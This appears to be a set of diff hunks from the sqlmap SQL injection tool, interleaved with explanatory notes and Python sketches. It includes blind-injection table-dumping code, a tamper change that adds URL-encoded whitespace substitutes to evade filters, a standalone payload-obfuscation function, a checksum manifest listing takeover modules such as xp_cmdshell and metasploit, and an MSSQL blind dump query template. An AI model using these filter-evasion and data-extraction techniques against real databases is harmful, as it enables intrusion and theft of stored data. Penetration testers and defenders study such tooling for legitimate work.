        if not entries and not kb.dumpKeyboardInterrupt:
            try:
                retVal = pivotDumpTable(table, colList, count, blind=True)
            except KeyboardInterrupt:
                retVal = None
                kb.dumpKeyboardInterrupt = True
                clearConsoleLine()
                warnMsg = "Ctrl+C detected in dumping phase"
                logger.warn(warnMsg)

            if retVal:
                entries, lengths = retVal

    else:
        emptyColumns = []
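Note: in the blind branch above, every retrieved value is appended to a per-column BigArray while lengths[column] keeps the widest rendered value, which later sets the column widths of the dump output. A plain-Python sketch of that bookkeeping, using ordinary lists and dicts instead of sqlmap's disk-backed BigArray and a made-up replacement map:

# Hypothetical stand-in for sqlmap's DUMP_REPLACEMENTS (how empty values are rendered)
DUMP_REPLACEMENTS = {"": "NULL", " ": "NULL"}

entries = {}   # column name -> retrieved values
lengths = {}   # column name -> widest rendered value, used for column padding

def record(column, value):
    entries.setdefault(column, [])
    lengths.setdefault(column, len(column))  # the header has to fit too
    rendered = DUMP_REPLACEMENTS.get(value, value)
    lengths[column] = max(lengths[column], len(rendered))
    entries[column].append(value)

for row in (("1", "luther"), ("2", ""), ("3", "fluffy")):
    record("id", row[0])
    record("name", row[1])

print(" | ".join(column.ljust(lengths[column]) for column in ("id", "name")))
for index in range(len(entries["id"])):
    print(" | ".join(DUMP_REPLACEMENTS.get(entries[column][index], entries[column][index]).ljust(lengths[column]) for column in ("id", "name")))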
@@ -42,7 +42,8 @@ def tamper(payload, **kwargs):
    # FF 0C new page
    # CR 0D carriage return
    # VT 0B vertical TAB (MySQL and Microsoft SQL Server only)
    blanks = ('%09', '%0A', '%0C', '%0D', '%0B')
    # A0 non-breaking space
    blanks = ('%09', '%0A', '%0C', '%0D', '%0B', '%A0')
    retVal = payload

    if payload:
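Note: the hunk above widens the pool of URL-encoded whitespace substitutes (adding the non-breaking space %A0) available to the tamper script. A self-contained sketch of the space-replacement idea outside sqlmap's tamper plumbing; the function name and the single-quote handling are illustrative assumptions.

import random

# URL-encoded characters that many SQL parsers accept in place of a space
BLANKS = ('%09', '%0A', '%0C', '%0D', '%0B', '%A0')

def space_to_random_blank(payload):
    """Replace each space outside of single quotes with a random blank substitute."""
    result = []
    quoted = False
    for char in payload:
        if char == "'":
            quoted = not quoted
        if char == " " and not quoted:
            result.append(random.choice(BLANKS))
        else:
            result.append(char)
    return "".join(result)

print(space_to_random_blank("1 AND 9227=9227"))
# e.g. 1%0DAND%099227=9227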
@@ -21,13 +21,13 @@ c55b400b72acc43e0e59c87dd8bb8d75 extra/shellcodeexec/windows/shellcodeexec.x32.
310efc965c862cfbd7b0da5150a5ad36 extra/sqlharvest/__init__.py
7713aa366c983cdf1f3dbaa7383ea9e1 extra/sqlharvest/sqlharvest.py
7afe836fd97271ccba67b4c0da2482ff lib/controller/action.py
fec857280fd553ee7e9b49fdfe104402 lib/controller/checks.py
f77daa397016460433d5e06704efd538 lib/controller/checks.py
130d1c16708668b8d89605b6b5b38bf5 lib/controller/controller.py
52a3969f57170e935e3fc0156335bf2c lib/controller/handler.py
a97df93b552ee4e4ba3692eae870de7c lib/controller/handler.py
310efc965c862cfbd7b0da5150a5ad36 lib/controller/__init__.py
d58e85ffeac2471ef3af729076b3b5f7 lib/core/agent.py
6cc95a117fbd34ef31b9aa25520f0e31 lib/core/bigarray.py
8390c2963730e65ad853f677793b8c1c lib/core/common.py
707bac1a4a6dee2cc608d6c75a93e254 lib/core/common.py
5065a4242a8cccf72f91e22e1007ae63 lib/core/convert.py
a8143dab9d3a27490f7d49b6b29ea530 lib/core/data.py
7936d78b1a7f1f008ff92bf2f88574ba lib/core/datatype.py

@@ -39,17 +39,17 @@ b9ff4e622c416116bee6024c0f050349 lib/core/enums.py
9381a0c7e8bc19986299e84f4edda1a0 lib/core/exception.py
310efc965c862cfbd7b0da5150a5ad36 lib/core/__init__.py
9ba39bf66e9ecd469446bdbbeda906c3 lib/core/log.py
edcfce0850771e6454acef244d5c5760 lib/core/optiondict.py
d85f2f63ffcb6135400339f9a7595a7b lib/core/option.py
f1531be15ed98555a9010e2db3c9da75 lib/core/optiondict.py
0ff0d360c02b4b92293aa7e5ee705d49 lib/core/option.py
5f2f56e6c5f274408df61943f1e080c0 lib/core/profiling.py
40be71cd774662a7b420caeb7051e7d5 lib/core/readlineng.py
d8e9250f3775119df07e9070eddccd16 lib/core/replication.py
785f86e3f963fa3798f84286a4e83ff2 lib/core/revision.py
40c80b28b3a5819b737a5a17d4565ae9 lib/core/session.py
652da168dac6476e7b997537c935cf17 lib/core/settings.py
ef98477008ba2b8998760985b60652a3 lib/core/settings.py
d91291997d2bd2f6028aaf371bf1d3b6 lib/core/shell.py
2ad85c130cc5f2b3701ea85c2f6bbf20 lib/core/subprocessng.py
8136241fdbdb99a5dc0e51ba72918f6e lib/core/target.py
037e052b288457a8588a297bd8669ae1 lib/core/target.py
8970b88627902239d695280b1160e16c lib/core/testing.py
40881e63d516d8304fc19971049cded0 lib/core/threads.py
ad74fc58fc7214802fd27067bce18dd2 lib/core/unescaper.py

@@ -57,7 +57,7 @@ ad74fc58fc7214802fd27067bce18dd2 lib/core/unescaper.py
4d13ed693401a498b6d073a2a494bd83 lib/core/wordlist.py
310efc965c862cfbd7b0da5150a5ad36 lib/__init__.py
8c4b04062db2245d9e190b413985202a lib/parse/banner.py
4185a1ed8fbec400dd297474ac89c357 lib/parse/cmdline.py
89c837c3b2cb2853839e127978bed8a6 lib/parse/cmdline.py
3a31657bc38f277d0016ff6d50bde61f lib/parse/configfile.py
14539f1be714d4f1ed042067d63bc50a lib/parse/handler.py
64e5bb3ecbdd75144500588b437ba8da lib/parse/headers.py

@@ -66,9 +66,9 @@ ad74fc58fc7214802fd27067bce18dd2 lib/core/unescaper.py
0b010b7cdb2e42b5aa0caa59607279ad lib/parse/payloads.py
997d0452e6fc22411f81a334511bcb3d lib/parse/sitemap.py
403d873f1d2fd0c7f73d83f104e41850 lib/request/basicauthhandler.py
86cb5ce3fa5530c255f4599bfc0cc4e2 lib/request/basic.py
3ba1c71e68953d34fc526a9d79d5a457 lib/request/basic.py
ef48de622b0a6b4a71df64b0d2785ef8 lib/request/comparison.py
aa43e66ab7e6afb6d276327287a5f168 lib/request/connect.py
4b056460279e65eef5f4f4fe293e657b lib/request/connect.py
fb6b788d0016ab4ec5e5f661f0f702ad lib/request/direct.py
cc1163d38e9b7ee5db2adac6784c02bb lib/request/dns.py
5dcdb37823a0b5eff65cd1018bcf09e4 lib/request/httpshandler.py

@@ -78,27 +78,27 @@ dc1e0af84ee8eb421797d61c8cb8f172 lib/request/methodrequest.py
bb9c165b050f7696b089b96b5947fac3 lib/request/pkihandler.py
602d4338a9fceaaee40c601410d8ac0b lib/request/rangehandler.py
111b3ee936f23167b5654a5f72e9731b lib/request/redirecthandler.py
20a0e6dac2edcf98fa8c47ee9a332c28 lib/request/templates.py
b373770137dc885889e495de95169b93 lib/request/templates.py
992a02767d12254784f15501a7ab8dd8 lib/takeover/abstraction.py
c6bc7961a186baabe0a9f5b7e0d8974b lib/takeover/icmpsh.py
310efc965c862cfbd7b0da5150a5ad36 lib/takeover/__init__.py
c90c993b020a6ae0f0e497fd84f37466 lib/takeover/metasploit.py
ac541a0d38e4ecb4e41e97799a7235f4 lib/takeover/registry.py
d466eab3ff82dbe29dc820e303eb4cff lib/takeover/udf.py
e7f3012f4f9e822d39eabd934d050b0e lib/takeover/web.py
b7dd3a2697a08108ddc9a4264922c2e8 lib/takeover/web.py
604b087dc52dbcb4c3938ad1bf63829c lib/takeover/xp_cmdshell.py
9f03972ea5ce2df74d43be5f30f068eb lib/techniques/blind/inference.py
201e7e69f9161dfa3aa10d83f690a488 lib/techniques/blind/inference.py
310efc965c862cfbd7b0da5150a5ad36 lib/techniques/blind/__init__.py
310efc965c862cfbd7b0da5150a5ad36 lib/techniques/dns/__init__.py
ab1601a7f429b47637c4fb8af703d0f1 lib/techniques/dns/test.py
d3da4c7ceaf57c4687a052d58722f6bb lib/techniques/dns/use.py
310efc965c862cfbd7b0da5150a5ad36 lib/techniques/error/__init__.py
628f1fe86603512ae122f868cdabbfb9 lib/techniques/error/use.py
84b729215fd00e789ed75d9c00c97761 lib/techniques/error/use.py
310efc965c862cfbd7b0da5150a5ad36 lib/techniques/__init__.py
310efc965c862cfbd7b0da5150a5ad36 lib/techniques/union/__init__.py
211e6dc49af6ad6bd3590d16d41e86db lib/techniques/union/test.py
d17ca7177a29d7d07094fc7dd747d4c5 lib/techniques/union/use.py
67f0ad96ec2207d7e59c788b858afd6d lib/utils/api.py
d71e48e6fd08f75cc612bf8b260994ce lib/techniques/union/test.py
db3090ff9a740ba096ba676fcf44ebfc lib/techniques/union/use.py
a73c3ddd0de359507a8ad59b363aa963 lib/utils/api.py
7d10ba0851da8ee9cd3c140dcd18798e lib/utils/brute.py
ed70f1ca9113664043ec9e6778e48078 lib/utils/crawler.py
ba12c69a90061aa14d848b8396e79191 lib/utils/deps.py

@@ -203,7 +203,7 @@ deed74334b637767fc9de8f74b37647a plugins/dbms/sybase/fingerprint.py
be7481a96214220bcd8f51ca00239bed plugins/generic/connector.py
5390591ca955036d492de11355b52e8f plugins/generic/custom.py
4ad4bccc03256b8f3d21ba4f8f759404 plugins/generic/databases.py
5eae2e0992a719bfce9cf78ed0a0ea2f plugins/generic/entries.py
106f19c1d895963e2efa8ee193a537ec plugins/generic/entries.py
55802d1d5d65938414c77ccc27731cab plugins/generic/enumeration.py
0d10a0410c416fece51c26a935e68568 plugins/generic/filesystem.py
2e397afd83939889d1a7a07893b19ae7 plugins/generic/fingerprint.py

@@ -264,7 +264,7 @@ b2331640743170f82be9a8c27f65b206 tamper/space2morecomment.py
507a174c64345df8df003ddba93c8cd1 tamper/space2morehash.py
0ce89b0d602abbd64344ab038be8acbc tamper/space2mssqlblank.py
fa66af20648b5538289748abe7a08fe6 tamper/space2mssqlhash.py
ca7597ba264ec731b8a73e9cad5334eb tamper/space2mysqlblank.py
9dde72d94ce42bf71e3615108fe0214f tamper/space2mysqlblank.py
038b8ea90f9a3a45b9bc67fcdff38511 tamper/space2mysqldash.py
5665c217ef8998bfd18f9ef1d8c617bd tamper/space2plus.py
a30fa43203d960c7a9d8709bf24ca401 tamper/space2randomblank.py

@@ -459,4 +459,4 @@ a279656ea3fcb85c727249b02f828383 xml/livetests.xml
3194e2688a7576e1f877d5b137f7c260 xml/payloads/stacked_queries.xml
c2d8dd03db5a663e79eabb4495dd0723 xml/payloads/time_blind.xml
ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml
5bd467d86d7cb55fbe5f66e4ff9a6bec xml/queries.xml
7fa7db2c2296baa5e9ea381d4880492f xml/queries.xml
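Note: the hunks above refresh txt/checksum.md5, where each entry is the MD5 digest of one source file. A hedged sketch of how such a manifest could be verified follows; the layout (hash, space, relative path) matches the lines above, but this is not sqlmap's own update code.

import hashlib
import os

def file_md5(path, chunk_size=8192):
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

def verify(manifest="txt/checksum.md5", root="."):
    mismatches = []
    with open(manifest) as handle:
        for line in handle:
            expected, _, relpath = line.strip().partition(" ")
            relpath = relpath.strip()
            if relpath and file_md5(os.path.join(root, relpath)) != expected:
                mismatches.append(relpath)
    return mismatches

if __name__ == "__main__":
    print(verify() or "all checksums match")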
@@ -194,7 +194,7 @@
        </columns>
        <dump_table>
            <inband query="SELECT %s FROM %s.%s"/>
            <blind query="SELECT MIN(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s)>'%s'" query2="SELECT MAX(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s) LIKE '%s'" count="SELECT LTRIM(STR(COUNT(*))) FROM %s" count2="SELECT LTRIM(STR(COUNT(DISTINCT(%s)))) FROM %s"/>
            <blind query="SELECT MIN(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s)>'%s'" query2="SELECT MAX(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s) LIKE '%s'" query3="SELECT %s FROM (SELECT %s, ROW_NUMBER() OVER (ORDER BY (SELECT 1)) AS LIMIT FROM %s)x WHERE LIMIT=%d" count="SELECT LTRIM(STR(COUNT(*))) FROM %s" count2="SELECT LTRIM(STR(COUNT(DISTINCT(%s)))) FROM %s"/>
        </dump_table>
        <search_db>
            <inband query="SELECT name FROM master..sysdatabases WHERE %s" condition="name"/>
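Note: the new query3 template gives MSSQL a row-addressable dump query built on ROW_NUMBER(), used by the Entries hunks earlier as query3 % (column, column, table, index). Filled in with a hypothetical column, table and row index, it expands as follows:

# query3 as defined above for MSSQL; placeholders are (column, column, table, row index)
query3 = "SELECT %s FROM (SELECT %s, ROW_NUMBER() OVER (ORDER BY (SELECT 1)) AS LIMIT FROM %s)x WHERE LIMIT=%d"

column = "name"                 # hypothetical column
table = "testdb.dbo.users"      # hypothetical table
index = 3                       # 1-based row number to fetch

print(query3 % (column, column, table, index))
# SELECT name FROM (SELECT name, ROW_NUMBER() OVER (ORDER BY (SELECT 1)) AS LIMIT FROM testdb.dbo.users)x WHERE LIMIT=3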